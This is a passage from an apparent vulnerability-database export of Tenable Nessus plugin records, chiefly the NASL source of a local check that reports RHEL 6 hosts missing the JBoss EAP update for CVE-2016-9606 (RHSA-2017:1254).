reference:\"jbossas-standalone-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossas-welcome-content-eap-7.5.15-1.Final_redhat_3.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"jbossweb-7.5.22-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketbox-4.1.5-1.Final_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-bindings-2.5.4-14.SP12_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"picketlink-federation-2.5.4-14.SP12_redhat_1.1.ep6.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"resteasy-2.3.19-1.Final_redhat_1.1.ep6.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"hibernate4-core-eap6 / hibernate4-eap6 / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:10", "description": "An update is now available for Red Hat JBoss Enterprise Application Platform 6.4 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java applications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15 serves as a replacement for Red Hat JBoss Enterprise Application Platform 6.4.14, and includes bug fixes and enhancements, which are documented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be forced to parse a request with YamlProvider, resulting in unmarshalling of potentially untrusted data. An attacker could possibly use this flaw execute arbitrary code with the permissions of the application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for reporting these issues.", "cvss3": {}, "published": "2017-05-22T00:00:00", "type": "nessus", "title": "RHEL 6 : JBoss EAP (RHSA-2017:1254)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9606"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6", "p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6", "p-cpe:/a:redhat:enterprise_linux:hornetq", "p-cpe:/a:redhat:enterprise_linux:httpserver", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6", "p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6", "p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cli", "p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all", "p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering", "p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp", "p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-connector", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client", "p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository", "p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http", "p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment", "p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3", "p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded", "p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf", "p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77", "p-cpe:/a:redhat:enterprise_linux:jboss-as-logging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-mail", "p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content", "p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging", "p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster", "p-cpe:/a:redhat:enterprise_linux:jboss-as-naming", "p-cpe:/a:redhat:enterprise_linux:jboss-as-network", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin", "p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service", "p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink", "p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean", "p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo", "p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller", "p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol", "p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting", "p-cpe:/a:redhat:enterprise_linux:jboss-as-sar", "p-cpe:/a:redhat:enterprise_linux:jboss-as-security", "p-cpe:/a:redhat:enterprise_linux:jboss-as-server", "p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx", "p-cpe:/a:redhat:enterprise_linux:jboss-as-threads", "p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions", "p-cpe:/a:redhat:enterprise_linux:jboss-as-version", "p-cpe:/a:redhat:enterprise_linux:jboss-as-web", "p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices", "p-cpe:/a:redhat:enterprise_linux:jboss-as-weld", "p-cpe:/a:redhat:enterprise_linux:jboss-as-xts", "p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client", "p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation", "p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base", "p-cpe:/a:redhat:enterprise_linux:jbossas-appclient", "p-cpe:/a:redhat:enterprise_linux:jbossas-bundles", "p-cpe:/a:redhat:enterprise_linux:jbossas-core", "p-cpe:/a:redhat:enterprise_linux:jbossas-domain", "p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs", "p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap", "p-cpe:/a:redhat:enterprise_linux:jbossas-standalone", "p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap", "p-cpe:/a:redhat:enterprise_linux:jbossweb", "p-cpe:/a:redhat:enterprise_linux:picketbox", "p-cpe:/a:redhat:enterprise_linux:picketlink-bindings", "p-cpe:/a:redhat:enterprise_linux:picketlink-federation", "p-cpe:/a:redhat:enterprise_linux:resteasy", "cpe:/o:redhat:enterprise_linux:6"], "id": "REDHAT-RHSA-2017-1254.NASL", "href": "https://www.tenable.com/plugins/nessus/100315", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2017:1254. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(100315);\n script_version(\"3.7\");\n script_cvs_date(\"Date: 2019/10/24 15:35:43\");\n\n script_cve_id(\"CVE-2016-9606\");\n script_xref(name:\"RHSA\", value:\"2017:1254\");\n\n script_name(english:\"RHEL 6 : JBoss EAP (RHSA-2017:1254)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update is now available for Red Hat JBoss Enterprise Application\nPlatform 6.4 for RHEL 6.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Moderate. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nRed Hat JBoss Enterprise Application Platform 6 is a platform for Java\napplications based on JBoss Application Server 7.\n\nThis release of Red Hat JBoss Enterprise Application Platform 6.4.15\nserves as a replacement for Red Hat JBoss Enterprise Application\nPlatform 6.4.14, and includes bug fixes and enhancements, which are\ndocumented in the Release Notes document linked to in the References.\n\nSecurity Fix(es) :\n\n* It was discovered that under certain conditions RESTEasy could be\nforced to parse a request with YamlProvider, resulting in\nunmarshalling of potentially untrusted data. An attacker could\npossibly use this flaw execute arbitrary code with the permissions of\nthe application using RESTEasy. (CVE-2016-9606)\n\nRed Hat would like to thank Moritz Bechler (AgNO3 GmbH & Co. KG) for\nreporting these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/documentation/en-US/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2017:1254\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-9606\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-core-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-entitymanager-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-envers-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hibernate4-infinispan-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:hornetq\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:httpserver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-common-spi-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-core-impl-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-deployers-common-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-jdbc-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-spec-api-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:ironjacamar-validator-eap6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-client-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-clustering\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-cmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-connector\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-controller-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-core-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-repository\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-deployment-scanner\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-http\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-domain-management\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ee-deployment\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-ejb3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-host-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jacorb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jaxrs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jdr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jpa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-jsr77\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-logging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-mail\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-management-client-content\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-messaging\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-modcluster\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-naming\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-network\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-configadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-osgi-service\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-picketlink\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-platform-mbean\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-pojo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-process-controller\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-protocol\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-remoting\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-sar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-security\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-system-jmx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-threads\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-transactions\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-version\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-webservices\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-weld\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-as-xts\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-ejb-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-security-negotiation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jboss-xnio-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-appclient\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-core\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-domain\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-javadocs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-modules-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-product-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-standalone\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossas-welcome-content-eap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:jbossweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-bindings\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:picketlink-federation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:resteasy\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2017:1254\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"jbossas-welcome-content-eap\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"JBoss EAP\");\n\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-core-eap6-4.2.26-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-eap6-4.2.26-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-entitymanager-eap6-4.2.26-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-envers-eap6-4.2.26-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hibernate4-infinispan-eap6-4.2.26-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"hornetq-2.3.25-20.SP18_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"httpserver-1.0.8-1.Final_redhat_1.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-common-spi-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-core-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-core-impl-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-deployers-common-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-jdbc-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-spec-api-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"ironjacamar-validator-eap6-1.0.38-3.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-appclient-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-cli-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-client-all-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-clustering-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-cmp-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-configadmin-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-connector-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-controller-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-controller-client-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-core-security-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-deployment-repository-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-deployment-scanner-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-domain-http-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-domain-management-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ee-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ee-deployment-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-ejb3-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-embedded-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-host-controller-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jacorb-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jaxr-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jaxrs-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jdr-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jmx-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"jboss-as-jpa-7.5.15-1.Final_redhat_3.1.ep6.el6\")) flag++;\n if 